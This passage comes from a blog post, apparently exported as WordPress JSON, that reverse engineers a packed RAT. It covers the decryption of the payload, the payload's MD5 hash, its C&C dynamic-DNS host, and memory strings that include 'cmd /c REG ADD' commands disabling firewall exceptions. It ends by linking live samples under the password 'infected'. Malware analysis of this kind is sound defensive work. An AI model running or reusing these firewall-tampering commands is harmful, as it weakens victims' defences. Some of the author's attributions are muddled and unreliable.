"\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\vbc.exe"<\/span>);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
Now for a little explaination. The other methods are self explainatory – we are most interested in the ‘tuy5u6ruy’ method. It should be noted that this method was exlicitly labled in the previous binary as to be called from the resource method. This particular method starts by opening a file handle of the running binary and returning a buffer containing the contents of the running binary. It then takes the contents of the array and runs its decryption routine on it (see class ‘ThirdXorr’ and finally runs the decrypted binary via the injection \/ persistance methods, adding the decrypted binary to startup. Ingenius. <\/p>\n
Once again, we’re going to rip off the code of the malware to return the decrypted binary. We’ll have to make a few changes however, like instead of grabbing the running process for a byte stream, we’ll pass a static binary. After all, why run the malware when we don’t have to? Also, there are a few fixups to do as this was originally compiled with VB.net and not C#, so minor casting issues are to be fixed. Also, we need to be sure we open the original binary at the top of the chain, not the one from the resource file in the FileOpen() method call:<\/p>\n
\"crackedagain\"<\/a><\/p>\n
It’s taken us a while, but the we have finally arrived at the target binary which is supposed to run. This binary, aptly named ‘haha.wut’, decrypted from our ripped code, is NOT a .net binary. In fact, its a vb6 binary, a dll at that. <\/p>\n
Filename:         haha.wut
\nMD5 Hash:         A953D2420CDAD1E4AE7F06AD56D893D7
\nDetection Ratio:  Unknown<\/p>\n
Packed? OF COURSE IT IS!<\/p>\n
\"so_very_packed\"<\/a><\/p>\n
From here, its a matter of running the thing in a controlled VM and pulling anything useful out of RAM. From what I saw, it wasn’t new 0day malware, rather some off the shell stuff called “nir_cmd.bss setsysvolume 65535”, and is a RAT. I know this because of the unique string present in the binary “bss_server.Socket” which, after a quick google search, is present in the malware “Ainslot”, one of the dozens of Zues variants which would technically make it a banker bot. See http:\/\/www.virusradar.com\/Win32_Ainslot.AA\/description<\/a>.<\/p>\n
What it does is turn off the firewall, gets the IP \/ geolocation, and then attempt to call home to a dynamic DNS provider. unfortunately for me, the IP associated with the dynamic DNS provider was no longer valid, however at the time, I’m told it pointed back to Syria.<\/p>\n
C&C host: alosh66.servecounterstrike.com<\/p>\n
nf1.no-ip.com [50.31.129.129]
\nnf2.no-ip.com [69.72.255.8]
\nnf3.no-ip.com [69.65.40.108]
\nnf4.no-ip.com [69.65.5.122]
\nQuery for DNS records for alosh66.servecounterstrike.com failed: Timed out <\/p>\n
Memory info:<\/p>\n
x27adf74 (314): cmd \/c REG ADD HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile \/v “DoNotAllowExceptions” \/t REG_DWORD \/d “0” \/f
\n0x27ae118 (282): cmd \/c REG ADD HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List \/v ”
\n0x27ae238 (32): ” \/t REG_SZ \/d ”<\/p>\n
0x27aebcc (32): api.ipinfodb.com
\n0x27aebf4 (50): GET \/v2\/ip_query.php?key=
\n0x27aec2c (44): &timezone=off HTTP\/1.1
\n0x27aec60 (44): Host: api.ipinfodb.com
\n0x27aec94 (46): Cache-Control: no-cache
\n0x27aece4 (20): 
\n0x27aed10 (22): 
\n0x27aed2c (66): GET \/v2\/ip_query_country.php?key=
\n0x27aed74 (26): 
\n0x27aeda8 (24): 
\n0x27aede8 (26): MaxClockSpeed<\/p>\n
Good stuff right? <\/p>\n
You can download the source for the first reversal app here<\/a>, the second here<\/a>, and the full malware \/ logs \/ good stuff here<\/a>. The password is ‘infected’.<\/p>\n
Happy cracking!<\/p>\n
\"woody\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Back for part 2 are we? Let’s get this show on the road. We’ve seen how awful the first piece of malware was in terms of how it was thrown together in all but 10 minutes, but you aint seen nothing yet. The next one actually embeds passwords inside and even email addresses. After that, […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,5,7],"tags":[92,40,48,50,106],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/834"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=834"}],"version-history":[{"count":7,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/834\/revisions"}],"predecessor-version":[{"id":863,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/834\/revisions\/863"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=834"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=834"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=834"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}